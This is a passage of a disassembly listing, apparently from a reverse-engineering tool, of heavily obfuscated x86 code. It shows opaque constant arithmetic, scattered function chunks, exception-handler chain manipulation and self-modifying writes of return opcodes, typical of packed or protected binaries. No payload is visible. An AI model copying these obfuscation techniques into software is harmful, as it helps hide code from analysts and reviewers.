sbb ecx, 4A032D7Ah
loc_44C9B6: ; CODE XREF: sub_442B3B:loc_44A5CEj
push 0FC5EE8CCh
xchg edx, [esp+0]
mov eax, edx
jmp loc_445C39
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
loc_44C9C5: ; CODE XREF: ut7h7i2x:loc_4559B8j
add edx, 521E4BA7h
xchg edx, [esp]
jmp loc_45339B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC28
loc_44C9D3: ; CODE XREF: sub_44EC28:loc_456F87j
xor eax, 603E4865h
call sub_45854D
push edx
push 0BD2DF899h
pop edx
and edx, ds:4000F6h
jmp loc_451F1E
; END OF FUNCTION CHUNK FOR sub_44EC28
; ---------------------------------------------------------------------------
loc_44C9F0: ; CODE XREF: ut7h7i2x:0044B7F1j
mov edi, 7D043568h
; =============== S U B R O U T I N E =======================================
sub_44C9F5 proc near ; CODE XREF: sub_441A79p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044550E SIZE 0000000D BYTES
xchg edi, [esp+0]
pop edi
push large dword ptr fs:0
mov large fs:0, esp
push ecx
mov ecx, edx
jmp loc_44550E
sub_44C9F5 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_324. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F300
loc_44CA10: ; CODE XREF: sub_44F300+A916j
jmp loc_44C3EC
; END OF FUNCTION CHUNK FOR sub_44F300
; ---------------------------------------------------------------------------
loc_44CA15: ; CODE XREF: ut7h7i2x:0045727Dj
jmp loc_448555
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_44CA1A: ; CODE XREF: sub_43D021:loc_444418j
xor ecx, 0CE537C2Bh
add ecx, 0F9E0044Dh
test eax, ecx
pop ecx
jz loc_44C8BB
jmp loc_4402F6
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_44CA34: ; CODE XREF: sub_43EF73:loc_453F40j
add eax, 0FED25472h
push eax
pushf
push 0CF62ABB1h
pop eax
and eax, 0DB182F72h
cmp eax, 7467970Ch
jmp loc_4471B2
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
loc_44CA53: ; CODE XREF: ut7h7i2x:00441CD8j
adc ecx, eax
jmp loc_446424
; ---------------------------------------------------------------------------
sbb ebp, edx
jmp sub_458CD2
; ---------------------------------------------------------------------------
loc_44CA61: ; CODE XREF: ut7h7i2x:loc_458932j
push 0D4FA1ACBh
pop eax
and eax, 1DF758A2h
add eax, 0ABFF87A6h
call sub_43AA94
jmp loc_458DBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_44CA7D: ; CODE XREF: sub_4408C2+30Aj
; sub_4408C2:loc_45A604j
lea eax, [ebp-26Fh]
cmp dword ptr [eax], 4742444Fh
jz loc_456EB1
jmp loc_4565CD
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
loc_44CA94: ; DATA XREF: sub_449E96-A015o
call sub_43AA94
mov ds:dword_41D0C8, eax
call sub_45548A
; =============== S U B R O U T I N E =======================================
sub_44CAA4 proc near ; CODE XREF: ut7h7i2x:00441D9Ej
; sub_453D8Bp
; FUNCTION CHUNK AT 00440D8E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00440EB1 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00449907 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044B11D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F765 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00457214 SIZE 0000001A BYTES
xchg edx, [esp+0]
pop edx
push ebp
mov ebp, esp
jnb sub_440DA3
add esp, 0FFFFFFECh
jmp loc_44B11D
sub_44CAA4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44CAB9 proc near ; DATA XREF: sub_43C98B+4o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043BA99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E4DB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00440283 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442CF2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D240 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00452919 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452F58 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00456CA4 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00459503 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045A0BF SIZE 00000025 BYTES
mov esp, ebp
pop ebp
mov eax, ds:dword_4481F4
or eax, eax
jnz loc_442CF2
jmp loc_43BA99
sub_44CAB9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44CACF: ; CODE XREF: ut7h7i2x:00450B52j
jle loc_446F0A
mov ebx, [esi]
; START OF FUNCTION CHUNK FOR sub_45854D
loc_44CAD7: ; CODE XREF: sub_45854D:loc_4435BDj
sub ebx, 0A8A047F7h
or ebx, 357DFF95h
add ebx, 40C3D06Bh
mov [ebx], eax
pop ebx
jmp loc_43E902
; END OF FUNCTION CHUNK FOR sub_45854D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454466
loc_44CAF1: ; CODE XREF: sub_454466:loc_43A7ACj
sub ebx, 3781D0E2h
; END OF FUNCTION CHUNK FOR sub_454466
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_44CAF7: ; CODE XREF: sub_447CBE-4FA9j
test ebx, 1
jmp loc_444F8B
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4450AC
loc_44CB02: ; CODE XREF: sub_4450AC+15j
call sub_43ECFF
; END OF FUNCTION CHUNK FOR sub_4450AC
; START OF FUNCTION CHUNK FOR sub_45002D
loc_44CB07: ; CODE XREF: sub_45002D-9A9Fj
jmp loc_44C62B
; END OF FUNCTION CHUNK FOR sub_45002D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44CB0C: ; CODE XREF: sub_439BF8:loc_453CC4j
cmp byte ptr [eax], 0EBh
jmp loc_459C0D
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450651
loc_44CB14: ; CODE XREF: sub_450651:loc_453838j
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
cmp ds:dword_43C454[eax*4], 0
jz loc_44E259
mov eax, [ebp+var_4]
jmp loc_456704
; END OF FUNCTION CHUNK FOR sub_450651
; =============== S U B R O U T I N E =======================================
sub_44CB30 proc near ; DATA XREF: ut7h7i2x:00446891o
call sub_456520
mov eax, 5AB1337Ah
call sub_43AA94
mov ds:dword_41D188, eax
lea eax, nullsub_456
mov byte ptr [eax], 0C3h
jmp nullsub_456
sub_44CB30 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_44CB53: ; CODE XREF: sub_443BC5-36F3j
ror edi, 19h
loc_44CB56: ; CODE XREF: sub_443BC5:loc_44E6CAj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_455B1E
jmp loc_450B3E
; END OF FUNCTION CHUNK FOR sub_443BC5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_343. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_288. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_44CB69: ; CODE XREF: sub_4462B0+13550j
jmp loc_43BB15
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F56
loc_44CB6E: ; CODE XREF: sub_446F56+D6E5j
jmp nullsub_193
; END OF FUNCTION CHUNK FOR sub_446F56
; ---------------------------------------------------------------------------
db 0C9h
dword_44CB74 dd 0 ; DATA XREF: sub_43A5C0+6r
; =============== S U B R O U T I N E =======================================
sub_44CB78 proc near ; CODE XREF: sub_407AEA+1Dp
; sub_407B2A+25p ...
call sub_442E62
loc_44CB7D: ; CODE XREF: ut7h7i2x:004596CCj
jmp nullsub_92
sub_44CB78 endp
; =============== S U B R O U T I N E =======================================
sub_44CB82 proc near ; CODE XREF: sub_44C6B4:loc_43BCF5j
var_8 = dword ptr -8
push ebx
push 0A1C73Ch
xchg ecx, [esp+8+var_8]
mov ebx, ecx
pop ecx
or ebx, 6CABD576h
sub ebx, 8CCF22FCh
add ebx, 2067BBDAh
jmp loc_44EE68
sub_44CB82 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_44CBA5: ; CODE XREF: sub_45341C:loc_4501E2j
sub eax, esi
sbb ebp, 426E56C0h
jmp loc_43E3AF
; END OF FUNCTION CHUNK FOR sub_45341C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451F39
loc_44CBB2: ; CODE XREF: sub_451F39:loc_440204j
push eax
mov eax, esi
xchg eax, [esp+4+var_4]
push offset loc_44B834
jmp nullsub_138
; END OF FUNCTION CHUNK FOR sub_451F39
; =============== S U B R O U T I N E =======================================
sub_44CBC2 proc near ; CODE XREF: ut7h7i2x:004496FBj
; sub_4431E4:loc_44F490p
; FUNCTION CHUNK AT 0043914A SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0043CA25 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443749 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
lea eax, [ebp-125h]
push eax
call sub_43BA59
mov [ebp-4], eax
jmp loc_43914A
sub_44CBC2 endp
; ---------------------------------------------------------------------------
loc_44CBDA: ; CODE XREF: ut7h7i2x:00453B2Dj
cmp eax, 0AAD5B351h
jmp loc_448ABB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455145
loc_44CBE5: ; CODE XREF: sub_455145:loc_43AABFj
mov edx, [edi]
jo loc_43DD1A
xor eax, 0E07C22BAh
jmp loc_4475D7
; END OF FUNCTION CHUNK FOR sub_455145
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4448D7
loc_44CBF8: ; CODE XREF: sub_4448D7:loc_45A429j
call sub_4448D7
; END OF FUNCTION CHUNK FOR sub_4448D7
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_44CBFD: ; CODE XREF: sub_4433C5:loc_4517B6j
add eax, 0D39486Ch
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_4445D4
jmp loc_443E5E
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_44CC13: ; CODE XREF: sub_44917B:loc_43D6AEj
jz loc_448B14
jmp loc_44BE6E
; END OF FUNCTION CHUNK FOR sub_44917B
; =============== S U B R O U T I N E =======================================
sub_44CC1E proc near ; DATA XREF: sub_45A6A5o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004488E6 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044EF13 SIZE 00000005 BYTES
pop large dword ptr fs:0
add esp, 4
push 680CEFACh
xchg ebp, [esp-4+arg_0]
mov eax, ebp
pop ebp
sub eax, 0A369E4C9h
jmp loc_4488E6
sub_44CC1E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_44CC3E: ; CODE XREF: sub_439D5C+5F25j
or eax, 6263ADAh
and eax, 0F9E7FDADh
add eax, 7F9802D8h
call sub_4448AF
jmp loc_44185D
; END OF FUNCTION CHUNK FOR sub_439D5C
; ---------------------------------------------------------------------------
jmp loc_44F33C
; ---------------------------------------------------------------------------
jmp ds:dword_41D144
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_14. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
add dword ptr [esi], 87FFFF72h
sub al, 24h
mov edx, ebp
pop ebp
mov eax, [esp]
push edx
jmp loc_44D46C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441AED
loc_44CC7A: ; CODE XREF: sub_441AED+18A3Ej
jl loc_459CC6
; END OF FUNCTION CHUNK FOR sub_441AED
; START OF FUNCTION CHUNK FOR sub_451B75
loc_44CC80: ; CODE XREF: sub_451B75+Fj
jmp nullsub_134
; END OF FUNCTION CHUNK FOR sub_451B75
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_44CC85: ; CODE XREF: sub_4524FE:loc_44A97Fj
jmp loc_446D89
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
or edi, 20950754h
mov ebp, [eax]
shr ebp, 14h
jmp loc_459CC0
; ---------------------------------------------------------------------------
and edx, edi
jnp loc_450C4F
jmp sub_4566F0
; ---------------------------------------------------------------------------
loc_44CCA7: ; DATA XREF: sub_454DE8-18B2Do
call sub_45601B
mov eax, 0CAAB96A5h
call sub_43AED9
push edi
push 43A32C6Ch
pop edi
xor edi, 0E4D9919Ah
add edi, 1EE5060Ah
jmp loc_4392E1
; ---------------------------------------------------------------------------
loc_44CCCE: ; CODE XREF: ut7h7i2x:004479A3j
sbb edx, 37EA0356h
mov edi, 11E1C7D4h
loc_44CCD9: ; CODE XREF: ut7h7i2x:loc_44798Dj
sub eax, 0E551A55Bh
add eax, 0B004EFA7h
add eax, ebp
add eax, 1AB1C2ECh
jmp loc_444EFB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_484. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44CCF3: ; CODE XREF: ut7h7i2x:00441E3Dj
push 9902B8DFh
pop edi
and edi, 2E0D6716h
rol edi, 1Fh
add edi, 0FC45599Ch
jmp loc_454B76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_44CD0D: ; CODE XREF: sub_4459EE:loc_457402j
jz loc_43A433
; END OF FUNCTION CHUNK FOR sub_4459EE
; START OF FUNCTION CHUNK FOR sub_44F069
loc_44CD13: ; CODE XREF: sub_44F069+7j
jmp nullsub_11
; END OF FUNCTION CHUNK FOR sub_44F069
; ---------------------------------------------------------------------------
loc_44CD18: ; CODE XREF: ut7h7i2x:0043D1F5j
jmp loc_453616
; ---------------------------------------------------------------------------
add esi, 495F9C5Fh
sbb ecx, ebx
pushf
jmp loc_43A42E
; ---------------------------------------------------------------------------
loc_44CD2B: ; DATA XREF: ut7h7i2x:00440068o
xchg ebx, [esp]
mov edx, ebx
pop ebx
call sub_4414CC
; START OF FUNCTION CHUNK FOR sub_459E54
loc_44CD36: ; CODE XREF: sub_459E54-9A8j
jmp loc_447A5D
; END OF FUNCTION CHUNK FOR sub_459E54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452950
loc_44CD3B: ; CODE XREF: sub_452950+Aj
jmp loc_43E3CC
; END OF FUNCTION CHUNK FOR sub_452950
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FFB1
loc_44CD40: ; CODE XREF: sub_43FFB1+16j
jmp loc_45044D
; END OF FUNCTION CHUNK FOR sub_43FFB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_44CD45: ; CODE XREF: sub_45967C-17C2Dj
or edx, 4BABA499h
jbe loc_447BC0
not edi
loc_44CD53: ; CODE XREF: ut7h7i2x:loc_43D286j
; sub_44640F+Aj ...
jmp loc_4556C9
; ---------------------------------------------------------------------------
loc_44CD58: ; CODE XREF: ut7h7i2x:00447A3Fj
; sub_45967C-4ADFj
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C20D
loc_44CD5B: ; CODE XREF: sub_44C20D-3DF0j
xor ebp, 0A166E0F6h
ja loc_451D52
jmp loc_43E91A
; END OF FUNCTION CHUNK FOR sub_44C20D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44928D
loc_44CD6C: ; CODE XREF: sub_44928D+Fj
rol ecx, 0Bh
test ecx, 20000h
jmp loc_450A70
; END OF FUNCTION CHUNK FOR sub_44928D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452C82
loc_44CD7A: ; CODE XREF: sub_452C82+2401j
push offset sub_4558D7
jmp nullsub_211
; END OF FUNCTION CHUNK FOR sub_452C82
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_44CD84: ; CODE XREF: sub_444A12-34B1j
push 38634810h
xchg edi, [esp+8+var_8]
mov ecx, edi
pop edi
or ecx, 0D45B3651h
rol ecx, 15h
jmp loc_44BDB8
; END OF FUNCTION CHUNK FOR sub_444A12
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_302. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439788
loc_44CD9E: ; CODE XREF: sub_439788:loc_445168j
call sub_441C8F
loc_44CDA3: ; CODE XREF: sub_445E13+10B2j
jmp loc_44DD23
; END OF FUNCTION CHUNK FOR sub_439788
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_44CDA8: ; CODE XREF: sub_43D021+2388j
jmp loc_442DE7
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4523B3
loc_44CDAD: ; CODE XREF: sub_4523B3:loc_44DBC7j
pop ecx
and ebx, 0D043B493h
sub ebx, 9A145215h
and ebx, 0D4BCEB65h
cmp ebx, 6E8840EFh
jmp loc_43D6A3
; END OF FUNCTION CHUNK FOR sub_4523B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457AEF
loc_44CDCB: ; CODE XREF: sub_457AEF-14789j
mov ecx, edi
loc_44CDCD: ; CODE XREF: ut7h7i2x:004553BDj
xchg ecx, [esp+4+var_4]
mov edi, eax
xchg edi, [esp+4+var_4]
mov eax, edx
call sub_4390DE
loc_44CDDC: ; CODE XREF: ut7h7i2x:0043D47Dj
jmp nullsub_62
; END OF FUNCTION CHUNK FOR sub_457AEF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44CDE1: ; CODE XREF: sub_43A556:loc_454F8Cj
adc ecx, 46441065h
or ecx, edx
push 0BBEEAEF2h
not edx
loc_44CDF0: ; CODE XREF: ut7h7i2x:0043BE9Fj
jmp loc_43EE42
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
mov ds:off_41D1F4, eax
lea eax, loc_45890F
mov byte ptr [eax], 0C3h
jmp loc_443245
; =============== S U B R O U T I N E =======================================
sub_44CE09 proc near ; CODE XREF: sub_41946E+94p
; ut7h7i2x:0043EFF5j
; DATA XREF: ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B80E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BBE2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043BD09 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E6C0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043F000 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00440331 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004408A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004422F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044532D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004496E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A2B9 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044A7A7 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044B813 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044BF8A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044C97A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E7AF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F08B SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00450386 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00454DCF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455C04 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004599A2 SIZE 00000005 BYTES
push edx
push 0FE89C75h
pop edx
sub edx, 0C8CBA683h
jmp loc_4496E7
sub_44CE09 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452CBB
loc_44CE1B: ; CODE XREF: sub_452CBB-10560j
; sub_4573BA+1Dj
rol eax, 9
push eax
push offset loc_445172
jmp loc_4426C9
; END OF FUNCTION CHUNK FOR sub_452CBB
; ---------------------------------------------------------------------------
loc_44CE29: ; CODE XREF: ut7h7i2x:0045A89Cj
mov edi, eax
xchg edi, [esp]
push 68C93D20h
xchg ecx, [esp]
mov eax, ecx
pop ecx
and eax, 514BD9E0h
add eax, 0BFFABBA5h
jmp loc_457D1D
; ---------------------------------------------------------------------------
jl loc_44A728
jmp sub_451039
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44CE55: ; CODE XREF: sub_439BF8+30E9j
test ebx, ebp
jmp loc_44A576
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
jmp ds:dword_41D05C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C5D9
loc_44CE62: ; CODE XREF: sub_44C5D9-EC0Cj
jmp nullsub_93
; END OF FUNCTION CHUNK FOR sub_44C5D9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_442. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
sub al, 24h
mov edx, ebp
pop ebp
jz loc_448687
mov eax, [esp]
call sub_44AD6F
; START OF FUNCTION CHUNK FOR sub_452BE9
loc_44CE7B: ; CODE XREF: sub_452BE9-1211Fj
jmp loc_456A85
; END OF FUNCTION CHUNK FOR sub_452BE9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_44CE80: ; CODE XREF: ut7h7i2x:00439389j
; sub_4549F0:loc_45067Aj
jmp loc_453257
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_44CE85: ; CODE XREF: sub_442B3B+139DEj
pop esi
rol esi, 6
add esi, 1F62F552h
push offset sub_45027B
jmp nullsub_254
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
loc_44CE99: ; CODE XREF: ut7h7i2x:loc_454F86j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456C93
loc_44CE9A: ; CODE XREF: sub_456C93+Cj
pop ecx
mov [ebp-20h], eax
jmp loc_452185
; END OF FUNCTION CHUNK FOR sub_456C93
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_44CEA3: ; CODE XREF: sub_43A513:loc_44BBD2j
test byte ptr [ebp-7], 8
jz loc_45167E
push ebp
mov eax, [ebp-20h]
jmp loc_45217C
; END OF FUNCTION CHUNK FOR sub_43A513
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439FD5
loc_44CEB6: ; CODE XREF: sub_439FD5+1D95Cj
jnp loc_450F48
cmp esi, ebp
jmp loc_451911
; END OF FUNCTION CHUNK FOR sub_439FD5
; =============== S U B R O U T I N E =======================================
sub_44CEC3 proc near ; DATA XREF: ut7h7i2x:00446A3Do
var_8 = dword ptr -8
lea eax, dword_444424
push eax
push ecx
mov ecx, eax
xchg ecx, [esp+8+var_8]
jmp loc_45621D
sub_44CEC3 endp
; ---------------------------------------------------------------------------
loc_44CED5: ; CODE XREF: ut7h7i2x:0043DD87j
pop edx
or edx, 8FF0FC9Eh
and edx, 9A90CFDEh
add edx, 65B3F1E9h
xchg edx, [esp]
jmp sub_45601B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_44CEF0: ; CODE XREF: sub_4408C2+EEE2j
jz loc_44D89D
jmp loc_45320A
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
test eax, 4F351AADh
jmp loc_455A0E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_44CF06: ; CODE XREF: sub_444029:loc_44A6E8j
add edx, ebp
add edx, 0F6F84A23h
mov edx, [edx]
add eax, edx
pop edx
mov [ebp-1Ch], eax
jmp loc_44E0AD
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B122
loc_44CF1B: ; CODE XREF: sub_44B122-DA21j
test eax, 4000000h
jmp loc_457C64
; END OF FUNCTION CHUNK FOR sub_44B122
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439C85
loc_44CF26: ; CODE XREF: sub_439C85+Bj sub_443666j
xor eax, eax
mov [ebp-8], eax
jmp loc_443673
; END OF FUNCTION CHUNK FOR sub_439C85
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_44CF30: ; CODE XREF: sub_43A513+1716Fj
test byte ptr [ebp-8], 8
jz loc_452185
push ebp
mov eax, [ebp-20h]
jmp loc_44FDCA
; END OF FUNCTION CHUNK FOR sub_43A513
; ---------------------------------------------------------------------------
mov esi, ebp
push ecx
jmp sub_4550FF
; ---------------------------------------------------------------------------
loc_44CF4B: ; CODE XREF: ut7h7i2x:loc_457C6Fj
rol ebp, 1Bh
add ebx, eax
xchg edx, [esi]
jmp loc_4540EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442987
loc_44CF57: ; CODE XREF: sub_442987+14DCFj
jz loc_44F7CD
; END OF FUNCTION CHUNK FOR sub_442987
; START OF FUNCTION CHUNK FOR sub_44D066
loc_44CF5D: ; CODE XREF: sub_44D066+4170j
jmp nullsub_130
; END OF FUNCTION CHUNK FOR sub_44D066
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E3FD
loc_44CF62: ; CODE XREF: sub_44E3FD+1811j
jmp sub_452E7F
; END OF FUNCTION CHUNK FOR sub_44E3FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455145
loc_44CF67: ; CODE XREF: sub_455145-7A9Bj
jmp loc_43A8D2
; END OF FUNCTION CHUNK FOR sub_455145
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_44CF6C: ; CODE XREF: sub_442B3B+9Fj
jmp loc_442857
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
loc_44CF71: ; CODE XREF: ut7h7i2x:00439265j
jmp loc_4590B0
; ---------------------------------------------------------------------------
sub eax, edx
or eax, edx
push 0CF9A0544h
jmp loc_44F7CD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_44CF84: ; CODE XREF: sub_43CE34:loc_43D90Aj
jnz loc_4564F9
mov eax, [ebp-20h]
mov byte ptr [eax], 64h
inc dword ptr [ebp-20h]
mov eax, [ebp-20h]
call sub_44FD54
; END OF FUNCTION CHUNK FOR sub_43CE34
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_68. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_44CF9C: ; CODE XREF: sub_450FDE-F2BBj
jmp loc_43B0CE
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_44CFA1: ; CODE XREF: sub_444EAA:loc_43FF9Aj
sub ebx, 0C4C9A6BFh
add esi, edi
mov ebx, [ecx]
shl edi, 0Dh
jg loc_43EA64
jmp loc_455E45
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
loc_44CFB9: ; CODE XREF: ut7h7i2x:loc_456762j
mov byte ptr [eax], 0C3h
jmp nullsub_20
; ---------------------------------------------------------------------------
call nullsub_490
jmp ds:dword_41D194
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453354
loc_44CFCC: ; CODE XREF: sub_453354+13j
jmp nullsub_456
; END OF FUNCTION CHUNK FOR sub_453354
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_490. PRESS KEYPAD "+" TO EXPAND]
dw 6384h
dd 0E9FFFF64h, 0FFFF1EA3h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_44CFDC: ; CODE XREF: sub_442B3B:loc_43F373j
; sub_442B3B:loc_44A1D6j ...
xor eax, 7BC177D2h
add eax, 97949074h
call sub_43D2F7
loc_44CFED: ; CODE XREF: ut7h7i2x:loc_443FACj
add edx, 6C03ABB2h
xchg edx, [esp+0]
jmp nullsub_15
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
sbb edi, 0DCEA8E63h
jmp sub_442836
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_44D006: ; CODE XREF: sub_444A12:loc_451AD1j
jz loc_44F7E5
jmp loc_44EE4D
; END OF FUNCTION CHUNK FOR sub_444A12
